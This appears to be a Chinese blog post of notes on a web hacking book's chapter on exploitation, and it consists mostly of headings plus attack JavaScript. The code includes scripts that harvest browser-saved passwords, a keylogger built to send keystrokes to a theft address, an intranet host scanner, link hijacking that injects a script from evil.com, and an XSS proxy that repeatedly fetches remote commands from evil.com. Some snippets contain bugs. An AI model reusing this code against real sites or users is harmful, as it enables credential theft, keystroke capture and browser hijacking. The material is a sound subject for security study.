web前端黑客技术揭秘 7.漏洞利用

7.1  渗透前的准备

 

7.2  偷取隐私数据

7.2.1  XSS探针:xssprobe

  https://github.com/evilcos/xssprobe/

 

 。。。。。。。。。。。。。

 7.2.2  Referer惹的祸

7.2.3  浏览器记住的明文密码

            get_pwd=function(){
                var e=document.createElement("input");
                e.name=e.type=e.id="password";
                document.getElementsByTagName("head")[0].appendChild(e);
                //往head添加就隐藏了
                setTimeout(function(){
                    alert("I can see ur pwd"+document.getElementById("password").value);
                },2000);
            }

        get_pwd = function () {
            var f = document.createElement("form");
            document.getElementsByTagName("head")[0].appendChild(f);
            //往head添加就隐藏了
            var e1 = document.createElement("input");
            e1.type = "text";
            e1.name = e1.id = "username";
            f.appendChild(e1);
            var e = document.createElement("input");
            e.name = e.type = e.id = "password";
            f.appendChild(e);
            setTimeout(function () {
                alert("I can see ur pwd:" + document.getElementById("password").value);
            }, 2000);
        }

7.2.4  键盘记录器

 

  1     var steal = "";//键盘记录发送地址
  2     var keystirng = "";//键盘记录的字符串
  3 
  4     function keypress(e) {//onkeypress时的操作
  5         var currKey = 0, CapsLock = 0, e = e || event;
  6         currKey = e.keyCode || e.which || e.charCode;
  7         CapsLock = currKey >= 65 && currKey <= 90;
  8         switch (currKey) {
  9             case 8: case 9: case 13: case 32: case 37: case 38: case 39: case 46: keyName = "";
 10 
 11                 break;
 12 
 13             default:
 14                 keyName = string.formCharCode(currKey);
 15                 break;
 16         }
 17         keystirng += keyName;
 18     }
 19 
 20     function keydown(e) {//onkeydown 时的操作
 21         var e = e || event;
 22         var currKey = e.keyCode || e.which || e.charCode;
 23         if ((currKey < 7 && currKey < 14) || (currKey > 31 && currKey < 47)) {
 24             switch (currKey) {
 25                 case 8:
 26                     keyName = "[LF]";
 27                     break;
 28                 case 9:
 29                     keyName = "[TAB]";
 30                     break;
 31                 case 13:
 32                     keyName = "[CR]";
 33                     break;
 34                 case 32:
 35                     keyName = "[SPACE]";
 36                     break;
 37                 case 33:
 38                     keyName = "[PageUp]";
 39                     break;
 40                 case 34:
 41                     keyName = "[PageDown]";
 42                     break;
 43                 case 35:
 44                     keyName = "[End]";
 45                     break;
 46                 case 36:
 47                     keyName = "[Home]";
 48                     break;
 49                 case 37:
 50                     keyName = "[LEFT]";
 51                     break;
 52                 case 38:
 53                     keyName = "[UP]";
 54                     break;
 55                 case 39:
 56                     keyName = "[RIGHT]";
 57                     break;
 58                 case 40:
 59                     keyName = "[DOWN]";
 60                 case 46:
 61                     keyName = "[DEL]";
 62                     break;
 63                 default:
 64                     keyName = "";
 65                     break;
 66             }
 67             if (keyName == "[CR]") { //如果是回车键,则提交键盘记录
 68                 //发出请求。steal+keystirng
 69             }
 70             keystirng += keyName;
 71         }
 72     }
 73     function keyup(e) {//onkeyup时的操作
 74         return keystirng;
 75     }
 76     function blur() {//onblur时的操作,离开焦点
 77         //。。。省略发送请求:steal_url+keystring
 78     }
 79     function bindEvent(o, e, fn) {//绑定事件的通用函数
 80         //o 绑定的标签对象
 81         //e 绑定的事件
 82         //fn 绑定后执行的函数
 83         if (typeof o == "undefined" || typeof e == "undefined" || typeof fn == "undefined" || o == null) {
 84             return false;
 85         }
 86 
 87         if (o.addEventListener) {
 88             o.addEventListener(e, window[fn], false);
 89         } else if (o.attachEvent) {    //IE
 90             o.attachEvent("on" + e, window[fn]);
 91         } else {
 92             var oldhandler = o["on" + e];
 93             if (oldhandler) {
 94                 o["on" + e] = function (x) {
 95                     oldhandler(x);
 96                     window[fn]();
 97                 }
 98             } else {
 99                 o["on" + e] = function (x) {
100                     window[fn]();
101                 }
102             }
103         }
104         o.focus();
105     }
106     o = document;//要监听的对象可以是整个document或某个表单项
107     bindEvent(o, 'keypress', "keypress");
108     bindEvent(o, 'keydown', "keydown");
109     bindEvent(o, 'keyup', "keyup");
110     bindEvent(o, 'blur', "blur");

 7.2.5  偷取黑客隐私的一个小技巧

 

7.3  内网渗透技术

7.3.1  获取内网IP

7.3.2  获取内网IP端口

7.3.3  获取内网主机存活状态

 1     function _pingscan(url,timeout){
 2         
 3         var d=new Date;
 4         if(window.xDomainRequest){ //IE8、IE9下
 5             var req=new XDomainRequest();
 6             req.onerror=fndprocessRequest;//发生错误时表明目标存活
 7             req.ontimeout=errprocessRequest;//发生超时时表明目标不存活
 8             req.timeout=timeout;//设置超时值
 9             function errprocessRequest(){
10                 alert(/down/);
11             }
12             function fndprocessRequest(){
13                 alert(/live/);
14             }
15         } else if(window.XMLHttpRequest){
16             var req=new XMLHttpRequest();
17             req.onreadystatechange=processRequest;
18             function processRequest(){
19                 if(req.readyState==4){
20                     var d2=new Date;
21                     var time=d2.getTime()-d.getTime();
22                     if(time<timeout){//小于超时值
23                         if(time>10){//大于10毫秒,这个条件判断可以忽略
24                             alert(/live/);//在指定超时值之内请求完成,则表明存活
25                         }
26                     }else{
27                         alert(/down/);//否则不存活
28                     }
29                 }
30             }
31         }else return;
32         req.open("get",url);
33         req.send();
34     }

7.3.4  开启路由器的远程访问能力

 

7.3.5  内网脆弱的Web应用控制

<script>
    window.onerror=function(){
        return true;
    }
    function y(){
        if(typeof(TracWysiwyg)=="function") alert("trac exist.");
    }

</script>
<script src="https://192.168.1.2/trac/chrome/tracwysiwyg/wysiwyg.js" onload="y()" onreadystatechange="y()"></script>

7.4  基于CSRF的攻击技术

 

7.5  浏览器劫持技术

<body>
    <!--劫持链接对象-->
    <a href="test1.html">test1.html</a><br/>
    <a href="test2.html">test2.html</a>
    <script>
        function script2obj(window_obj,src){
            s=window_obj.document.createElement("script");
            s.src=src;
            window_obj.document.getElementsByTagName("body")[0].appendChild(s);
        }
        function hijack_links(js){
            /* 劫持链接点击,参数说明:
            js:注入打开的同域链接页面的目标js文件*/
            for (i=0;i<document.links.length;i++) {
                //遍历链接对象,劫持onclick事件
                document.links[i].onclick=function(){
                    x=window.open(this.href);//获取打开新窗口的对象
                    setTimeout("script2obj(x,'"+js+"')",2000);
                    //延迟2秒向打开的劫持链接对象的DOM树中注入alert.js文件
                    return false;
                }
            }
        }
        hijack_links("http://www.evil.com/alert.js")
    </script>
</body>

 

7.6  一些跨域操作技术

7.6.1  IE res:协议跨域

7.6.2  CSS String Injection跨域

7.6.3  浏览器特权区域风险

7.6.4  浏览器扩展风险

 

 

7.6.5  跨子域:document.domain技巧

 

7.6.6  更多经典的跨域索引

 

7.7  XSS Proxy技术

        function inj_script(src,onload){
            o=document.createElement("script");
            o.src=src;
            if(onload){
                if(!window.ActiveObject){
                    o.onload=onload;
                }else{
                    o.onreadystatechange=function(){
                        if(o.readyState=="loaded" || o.readyState=="complete"){
                            onload();
                        }
                    }
                }
            }
            document.getElementsByTagName("body0")[0].appendChild(o);
            return o;
        }
        function remove_obj(o){
            document.body.removeChild(o);
        }
        setInterval(function(){
            var rtcmd=inj_script("http://www.evil.com/rtcmd?date="+new Date().getTime());
            setTimeout(function(){
                remove_obj(rtcmd);
            },500);
        },3000);

7.7.3  服务器WebSocket推送请求

 1         var wsUri = "ws://echo.websocket.org/";
 2         //ws://协议表示这是WebSocket服务端地址
 3         var output;
 4         function init() {
 5             output = document.getElementById("output");
 6             testWebSocket();
 7         }
 8         function testWebSocket() {
 9             websocket = new WebSocket(wsUri);//新建一个连接
10             websocket.onopen = function (evt) {//当连接创建时,触发
11                 onOpen(evt);
12             };
13             websocket.onclose = function (evt) {
14                 //当连接关闭,触发
15                 onClose(evt);
16             }
17 
18             websocket.onmessage = function (evt) {
19                 //当接收到服务端发送过来的消息时,触发
20                 onMessage(evt);
21             }
22             websocket.onerror = function (evt) {
23                 //当错误时,触发
24                 onError(evt);
25             }
26         }
27         function onOpen(evt){
28             writeToScreen("CONNECTED");
29             doSend("WebSocket rocks");
30         }
31         function onClose(evt){
32             writeToScreen("DISCONNECTED");
33         }
34         function onMessage(evt){
35             writeToScreen("<span style='color:blue'>RESPONSE:"+evt.data+"</span>");
36             websocket.close();
37         }
38         function onError(evt){
39             writeToScreen("<span style='color:red'>ERROR:"+evt.data+"</span>");
40         }
41         function doSend(message){
42             writeToScreen("SENT:"+message);
43             websocket.send(message);//发送消息到服务器
44         }
45         function writeToScreen(message){
46             var pre=document.createElement("p");
47             pre.style.wordWrap="break-word";
48             pre.innerHTML=message;
49             output.appendChild(pre);    
50         }
51         window.addEventListener("load",init,false);

7.7.4  postMessage方式推送指令

7.8  真实案例剖析

7.8.1  高级钓鱼工具之百度空间登录DIV层钓鱼

7.8.2  高级钓鱼工具之Gmail正常服务钓鱼

7.8.3  人人网跨子域盗取MSN号

7.8.4  跨站获取更高权限

7.8.5  大规模XSS攻击思想

7.9  关于XSS利用框架

原文地址:https://www.cnblogs.com/wingzw/p/7423741.html